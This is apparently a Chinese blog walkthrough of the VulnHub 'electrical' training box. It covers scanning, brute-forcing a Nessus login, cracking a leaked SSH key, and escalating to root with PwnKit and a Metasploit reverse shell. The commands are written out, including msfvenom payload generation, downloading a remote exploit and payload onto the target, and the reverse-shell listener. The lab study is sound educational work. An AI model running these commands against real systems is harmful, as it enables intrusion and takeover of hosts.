https://www.vulnhub.com/digitalworldlocal-electrical,747/
选择镜像文件进行下载。下载后解压是一个ovf文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。
文件名:ELECTRICAL.7z
文件大小:12 GB
MD5:52A1BA392DAD4E47FAF3AC29C32A624F
SHA1:6A0785D226BD311318648129BC53B7E136A5455D
无
获取root权限,共有两个flag。
普通用户:local.txt
root用户:proof.txt
确定IP地址、端口扫描、SMB探测、网站访问、目录扫描、暴力破解。
使用nmap确定该靶场IP地址,地址为:192.168.241.170。
namp -sP 192.168.241.0/24
使用nmap进行端口扫描,发现其开放22、113、139、445、8834和22222端口。
nmap -sV -v -T4 -A -P 192.168.241.170
AI总结一下:
使用enum4linux尝试进行用户枚举,发现两个共享:print$(用于打印驱动)和IPC$(进程间通信服务)。
enum4linux 192.168.241.170
还发现两个用户govindasamy和eletrical。
访问8834端口,发现是Nessus扫描器。
https://192.168.241.170:8834
扫描发现多个页面可访问,经过逐一访问并未发现可用信息。
dirsearch -u https://192.168.241.170:8834
既然已经知道用户名,尝试对其进行爆破。
发现账密为:govindasamy/password。
网站登录、发现SSH连接密钥、保存密钥信息、爆破密码、SSH连接进入靶机、查看local.txt文件、查阅本机其他信息、使用linpeash进行监测。
使用爆破的用户名和密码登录Nessus。
在扫描-认证检查-配置-描述中发现了SSH连接密钥。
Check on electrical servers!
Log into "electrical" via SSH. We use the same private-public key pair across the network for convenience.
We know you need to troubleshoot the servers sometimes, but do not necessary have the key. Here is the key:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCN+0u3mq
mCbqYwo4vCR1VqAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDbvoOZlrzD
vS5ADlguD1jbgAqmXuOrPiS5IEsyN19zuDzYZL9XKcrsvlhzM8J8DdAG69pU/kLBdem/en
ZWa88B/LCYJWHKs3AnNzA9tsk6tM2PIKVWvoqG+e5DLc3TIb/48Y9MoCUUfpBp1uJJhWNk
0r1ph2JWzXfNkUTXozNrwkToIJWlrwgxikfPU328xVNwW/zZdU3Az2TQZYyrcm3D9QT6NN
Sdml7bjh5ULYg4U6UBm6gwFtWFbcmEiST7ENJPSesyefJqGIL2VoXIsZC4A0ocW2teE/KI
PQv+cbP0bKPHFD0B3xze8vhnHwJElE8pywMqgmn9VgPvMvv1+YBrAAAD0MV9eKrECZivMr
ABDFavCx4vvIAJOoB6EupNKtBOG310CQX0yp7DXbodZxMQf45CT6U7gh3R10igfmpAlUza
bszxm91LTct9Ji/3YiQZHzEDF5wPvVzYOm2b4LYuRlSaOQ8hS1bNuxaWZRSyMA/MEr6Ghh
KoF1BtcbVGA7SMW4M6csx1KHRmaHhkd7XQl7UDxPglpyhVml5uWLLOv2zIx9XzgP6MXkXO
KQk0A5lSbsQSP2b6HD2khc82kPLqzRZLyCw0+qv6QGL/M5wHQh13YVqQxYEYVFFKrw93fq
5Ue9et/Pi0bhxOU8kmZOydYi4N4tq0GF3576DSJcACzUOaq84GxToBs0QOfamjA0JySip8
fhH5hh1xTpoY9UIRyaoxqsak6x+CdRNoJJ3TipCo0S4u9fuWBRBC3lraX5FX/7VDnxOOhY
tnoswke4KaMFM/IM0c6M91V3680OWWjrZBgjQse8tD2TP4/5PphMnCPlW2kTho99yEW7lu
DYOJBzbMo36VeE1fHzV0V+vfK5lwzom1Je0uwW+M8GC9J1PI+PLPgu0kFB73qi1A1PbznS
oO8Np9W3+SvczxgZTp9mYNwY5UBIQVHEoHz9buiIRr5qaZYIqLcIX4RaWUAWhkeoMpnvWy
wNkc2m3Dej5y6vxD8VQ2o1hXcDL9DfjGGFVaT6ZvY2zRGX7m09IHbJkY9ZpGdAE4kR+Adc
GLtv2S0FDHiJtXUiGLDrae6ALhUAAemZ51JOnKf8lhfC2O5nMN8VMV2Os7gPnjvz690COL
Voj+Q40EwYTMP9B/Syk0KTLxB735eUCMmWDITdQRdGCRCXnnAxvdv/ARK5Avm7ujRp2u+T
9mxuSk1d4Kp4Xaid6ymiTKbdAL9OuTGlGwyv23HVbnnOe3MJcDFBmNbDGCyAgQvfdG2cOr
jk+4v+OUgAhJxYcR8UYKY+yLtt3bkZHZCYsEuRCmeovbBglAO1bdZoUD3IFdUmKF/VLhEK
9Bi5np4zXfIodED2NWJYQEO++nPdmkPEf5reXRwVivL70sg2npED5LUCLlcUVztovjilIT
3arJ9VBsT7QWyWow1dDTwibjUsnYftacrUbBjQH9b1sJGAtx1bmLMmwmqOVXkVv5RZ4vLX
slKbgkO27r3UKjtOq/2Y0Kz54nFQ1ptoeh933ROjwOGoK48xwkG2oiuPpkkaEvv7b9W5hX
MAy0huF9kuP5SIWHu8CNjD9GF/wV8NomDrl84BEU30Omd+RRX/kyNWWThhADa/z5o3pK9E
9G9Jgp7VMUK7uEHXFBbIfttPJJOVk=
-----END OPENSSH PRIVATE KEY-----
在登录信息中发现登录的用户名为electrical。
将获得到的连接密钥保存到OpenSSH.txt文件中。
使用ssh2john转化为SSH密钥为john可以破解的格式。
ssh2john OpenSSH.txt > OpenSSH-JM.txt
使用john破解,得到electrical用户的密码为electrical。没想到用户名和密码相同……
john --wordlist=/usr/share/wordlists/rockyou.txt OpenSSH-Jm.txt
连接失败,原因:未给私钥权限。
重新起一个靶机重新进行以上操作。新靶机IP地址是192.168.241.171。
vim ia_Openssh
chmod 600 ia_Openssh
ssh2john ia_Openssh > 123.txt
ssh electrical@192.168.241.171 -p 22222 -i ia_Openssh
ls
cat local.txt
查看本机有哪些用户。
ls -al /home
查看本机网络连接情况。
netstat -antulp
查看系统进程信息。
top
查看具有SUID权限的文件。
find / -perm -u=s -type f 2>/dev/null
查看内核版本及系统版本。
uname -a
uname -r
cat /etc/issue
cat /etc/*release
查看定时任务。
cat /etc/crontab
linpeas
python3 -m http.server 9876
wget http://192.168.241.138:9876/linpeas.sh
执行失败,添加可执行权限。
chmod +x linpeas.sh
ls -l linpeas.sh
./linpeas.sh
经过一圈检测,并未发现可利用条件。
网络查阅后,可采用CVE-2021-4034(PwnKit)漏洞。
下载编译文件,执行文件,获得flag。
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
wget http://192.168.241.138:9876/PwnKit
chmod +x PwnKit
./PwnKit
id
whoami
cd ~
cat proof.txt
恭喜您获得这台机器的root shell!
反弹shell生成命令,MSF生成脚本文件,靶机下载该脚本文件,开启监听执行脚本,使用suggester模块提权,提权成功。
网址:https://forum.ywhack.com/reverse-shell/
生成shell脚本:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.241.138 LPORT=10002 -f elf -o reverse.elf
生成主机监听命令:
msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost 192.168.241.138; set lport 10002; exploit"
在MSF中依次运行以下命令。
msfconsole
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.241.138 LPORT=10002 -f elf -o reverse.elf
生成reverse.elf文件。
开启临时http服务。
python3 -m http.server 9876
在靶机中下载该文件。
wget http://192.168.241.138:9876/reverse.elf
授予可执行权限。
ls -ll reverse.elf
chmod +x reverse.elf
ls -ll reverse.elf
攻击机开启监听,随后在靶机中执行上传的revers.elf文件。
攻击机执行:
msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost 192.168.241.138; set lport 10002; exploit"
靶机执行:
./reverse.elf
成功将shell反弹至MSF。
后台挂起session。
bg
search sugg
use 1
set session 1
run
共展示可以利用以下漏洞进行提权。
经过多次尝试,最后选择使用CVE-2021-4034漏洞。
shell
ls
cd ~
cat proof.txt
id
免责声明
本公众号“暗魂攻防实验室”致力于分享网络安全相关知识及资讯,所有内容仅供学习和交流使用,不得用于任何非法用途。由于传播、利用本公众号“暗魂攻防实验室”所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任!!!
以下为本公众号声明内容,请知悉并遵守:
1.关于信息的准确性
本公众号所发布的信息均来源于公开渠道或作者整理,仅供参考,不保证内容的绝对准确性、完整性和时效性。使用者在依赖相关内容前,应独立核实信息的真实性和适用性。
2.法律与合规性
使用者应严格遵守国家相关法律法规,确保所有操作仅用于合法用途。本公众号明确禁止任何利用内容进行非法活动的行为,由此产生的后果由使用者自行承担,本公众号及作者不承担任何责任。
3.版权声明
本公众号部分内容如引用了他人作品或资源,均已标注来源或作者。如有侵权,请及时联系我们,我们将在核实后立即删除并致以歉意。
4.合法用途限制
本公众号内容仅供参考,任何利用本公众号内容从事违法行为的后果均由使用者自行承担,本公众号及作者对此不承担任何责任。
5.风险告知
因使用或传播本公众号内容导致的直接或间接后果(如系统损坏、数据丢失、法律责任等),均由使用者自行承担。本公众号及作者对此不承担任何责任。
原文始发于微信公众号(暗魂攻防实验室):【渗透测试】digitalworld.local: electrical靶场渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论